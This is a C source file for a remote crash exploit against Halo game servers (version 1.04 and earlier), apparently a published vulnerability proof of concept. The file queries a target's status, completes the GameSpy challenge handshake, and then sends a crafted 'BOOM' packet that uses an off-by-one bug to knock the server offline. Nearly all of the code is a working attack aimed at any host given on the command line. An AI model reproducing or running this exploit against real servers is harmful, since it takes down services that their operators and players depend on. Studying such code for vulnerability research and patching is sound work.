/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "gssdkcr.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define BUFFSZ  12300   // max packet accepted to crash, useless
#define PORT    2302
#define TIMEOUT 3
#define BOOMSZ  1       // yes 1 because it is an off-by-one bug
#define PCK     "\xFE\xFE\x01\x00\x00\x00\x00" \
                "00000000000000000000000000000000"
                // base for the random client's challenge



void gs_info_udp(struct sockaddr_in *peer);
u_long resolv(char *host);
int timeout(int sock);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                len,
                port = PORT;
    u_char      buff[BUFFSZ + 1];
    struct  sockaddr_in peer;


    setbuf(stdout, NULL);

    fputs("\n"
        "Halo <= 1.04 remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\nTarget %s:%hu\n",
        inet_ntoa(peer.sin_addr),
        port);

    fputs("- Request informations\n", stdout);
    gs_info_udp(&peer);

    fputs("- Start attack\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    memcpy(buff, PCK, sizeof(PCK) - 1);
    gssdkcr(buff + 7, buff + 7, 0);

    if(sendto(sd, buff, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\n"
            "Error: socket timeout, probably the server is not online\n"
            "\n", stdout);
        exit(1);
    }
    len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
    if(len < 0) std_err();
    buff[len] = 0x00;

    memcpy(buff, "\xfe\xfe\x03\x00\x01\x00\x01", 7);
    gssdkcr(buff + 7, buff + 39, 0);
    memset(buff + 39, 'a', BOOMSZ);
    memcpy(buff + 39 + BOOMSZ,
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xaf\x18\x43\x09\x00",
        20);

    fputs("- Send BOOM packet\n", stdout);
    if(sendto(sd, buff, BOOMSZ + 59, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n", stdout);
    }

    close(sd);

    return(0);
}



void gs_info_udp(struct sockaddr_in *peer) {
    int     sd,
            len,
            nt = 1;
    u_char  buff[2048],
            *p1,
            *p2;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)peer, sizeof(*peer))
      < 0) std_err();

    if(timeout(sd) < 0) {
        fputs("\n"
            "Alert: Socket timeout, no answers received\n"
            "\n", stdout);
        close(sd);
        return;
    }
    len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL);
    if(len < 0) std_err();
    buff[len] = 0x00;

    p1 = buff;
    while((p2 = strchr(p1, '\\'))) {
        *p2 = 0x00;
        if(!nt) {
            printf("%30s: ", p1);
            nt++;
        } else {
            printf("%s\n", p1);
            nt = 0;
        }
        p1 = p2 + 1;
    }
    printf("%s\n\n", p1);

    close(sd);
}



u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


